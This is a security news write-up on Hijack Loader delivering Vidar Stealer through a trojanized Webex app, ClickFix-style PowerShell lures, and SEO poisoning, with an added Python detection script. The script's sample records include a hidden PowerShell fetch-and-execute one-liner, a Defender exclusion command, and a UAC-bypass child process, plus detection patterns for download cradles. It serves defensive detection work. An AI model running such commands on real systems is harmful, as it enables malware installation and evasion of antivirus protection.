Emerging Threats: Hijack Loader, Vidar Stealer, and Evolving Malware Campaigns
Threat actors are using free or pirated versions of commercial software to deliver a malware loader called Hijack Loader, which then deploys the Vidar Stealer information stealer.
Researchers from Trellix have detailed a campaign in which users are tricked into downloading password-protected archives containing a trojanized version of the Cisco Webex Meetings App. When executed, the application stealthily loads Hijack Loader, which ultimately deploys Vidar Stealer using DLL side-loading (placing a malicious DLL beside a legitimate, often signed, executable that loads it by name, so the malicious code runs under a trusted process).
The malware uses known methods to bypass User Account Control (UAC) and gain elevated privileges, then adds its own files to Windows Defender's exclusion list so that subsequent payloads are never scanned. Alongside credential theft, the attack chain also drops additional payloads such as cryptocurrency miners.
This disclosure accompanies a rise in ClearFake campaigns, which trick users into executing PowerShell scripts under the guise of fixing web page issues, leading to the delivery of Lumma Stealer and other malware such as Amadey Loader and the XMRig miner. Similarly, malspam campaigns attributed to TA571 rely on social engineering: emails with HTML attachments prompt recipients to run PowerShell commands or install MSI/VBS files, resulting in the deployment of Matanbuchus and DarkGate.
Proofpoint researchers note that these threats are hard to detect because they rely on user interaction rather than an exploit: the victim copies the malicious command to the clipboard and runs it themselves, so there is no malicious file attachment to scan, and the activity appears in telemetry as a user-launched PowerShell process, which makes antivirus and EDR detection challenging.
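The behaviours described above (a user-launched PowerShell one-liner with a download cradle, a Defender exclusion being added, and a shell spawned by an auto-elevating binary) all leave traces in process-creation telemetry even when file-based scanning sees nothing. The following is an added example, not code from Trellix, Proofpoint or any of the campaigns discussed; it runs three simple rules over constructed Sysmon-style process-creation records. The specific UAC-bypass binaries it watches (fodhelper.exe, ComputerDefaults.exe) are an assumption, since the article does not say which method the loader uses, and the paths, users and command lines in the sample records are constructed for illustration.

```python
"""Toy detection pass over constructed Sysmon-style process-creation records.

Rules (assumptions about what the campaigns look like in telemetry, not
indicators published with the article):
  1. explorer.exe launching PowerShell with hidden/encoded/download-cradle
     arguments: the ClearFake/TA571 "paste this command to fix it" pattern,
     where the user starts the process from the Run dialog or a console.
  2. Any process calling Add-MpPreference/Set-MpPreference with an exclusion
     parameter: the Defender exclusion step.
  3. cmd/PowerShell whose parent is an auto-elevating binary: a common tell
     for registry-hijack UAC bypasses (fodhelper.exe is assumed here).
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str
    user: str


@dataclass
class Finding:
    rule: str
    event: ProcessEvent


# Windows is case-insensitive, so every pattern is compiled with re.I.
POWERSHELL_IMAGE = re.compile(r"(?:^|\\)(?:powershell|pwsh)\.exe$", re.I)
CLICKFIX_ARGS = re.compile(
    r"(?:-w(?:indowstyle)?\s+hidden"            # hidden window
    r"|-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"  # base64 payload
    r"|\biex\b|invoke-expression"               # in-memory execution
    r"|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|https?://)",  # cradle
    re.I,
)
DEFENDER_EXCLUSION = re.compile(
    r"(?:add|set)-mppreference\b.*-exclusion(?:path|process|extension)", re.I
)
AUTO_ELEVATE_PARENTS = {"fodhelper.exe", "computerdefaults.exe"}  # assumption
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Last path component, lower-cased, so rules can compare file names."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return a Finding for every rule that fires, in event order."""
    findings = []
    for ev in events:
        parent = basename(ev.parent_image)
        if (POWERSHELL_IMAGE.search(ev.image)
                and parent == "explorer.exe"
                and CLICKFIX_ARGS.search(ev.command_line)):
            findings.append(Finding("clickfix_powershell_from_explorer", ev))
        if DEFENDER_EXCLUSION.search(ev.command_line):
            findings.append(Finding("defender_exclusion_added", ev))
        if parent in AUTO_ELEVATE_PARENTS and basename(ev.image) in SHELLS:
            findings.append(Finding("uac_bypass_autoelevate_child", ev))
    return findings


def example_events():
    """Constructed sample telemetry: three malicious records and two benign."""
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    explorer = r"C:\Windows\explorer.exe"
    return [
        # 1. user pasted a ClickFix one-liner into Win+R (parent is explorer)
        ProcessEvent(ps, explorer,
                     'powershell.exe -w hidden -c "iex (iwr https://example.invalid/fix.txt).Content"',
                     r"LAB\alice"),
        # 2. loader adds its drop directory to Defender exclusions
        ProcessEvent(ps, r"C:\Users\alice\Downloads\WebexSetup.exe",
                     r"powershell.exe -Command Add-MpPreference -ExclusionPath 'C:\Users\alice\AppData\Roaming'",
                     r"LAB\alice"),
        # 3. cmd.exe spawned by an auto-elevating binary (assumed UAC bypass)
        ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\fodhelper.exe",
                     r"cmd.exe /c C:\Users\alice\AppData\Roaming\stage2.exe", r"LAB\alice"),
        # benign: user opened an interactive console
        ProcessEvent(ps, explorer, "powershell.exe", r"LAB\alice"),
        # benign: scheduled backup script from a fixed path
        ProcessEvent(ps, r"C:\Windows\System32\svchost.exe",
                     r"powershell.exe -File C:\scripts\backup.ps1", "NT AUTHORITY\\SYSTEM"),
    ]


def rules_fired(events=None):
    """Rule names in order, for the sample set when no events are given."""
    return [f.rule for f in detect(example_events() if events is None else events)]


if __name__ == "__main__":
    for f in detect(example_events()):
        print(f"{f.rule:36} {f.event.user:20} {f.event.command_line}")
```

The rules deliberately key on parent-child relationships and argument shape rather than on hashes or domains, which is what survives a campaign rotating its lures and hosting. Rule 1 is the noisy one in practice: administrators do launch PowerShell from Explorer, so the argument filter (hidden window, encoded command, download cradle) is what keeps the interactive console and the scheduled script in the sample set from firing.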

Additionally, eSentire has identified a campaign that uses lookalike websites imitating Indeed[.]com to deliver SolarMarker malware through SEO poisoning, so that the malicious site appears among seemingly legitimate search results. The campaign is a reminder that a high-ranking search result is not evidence of a trustworthy site.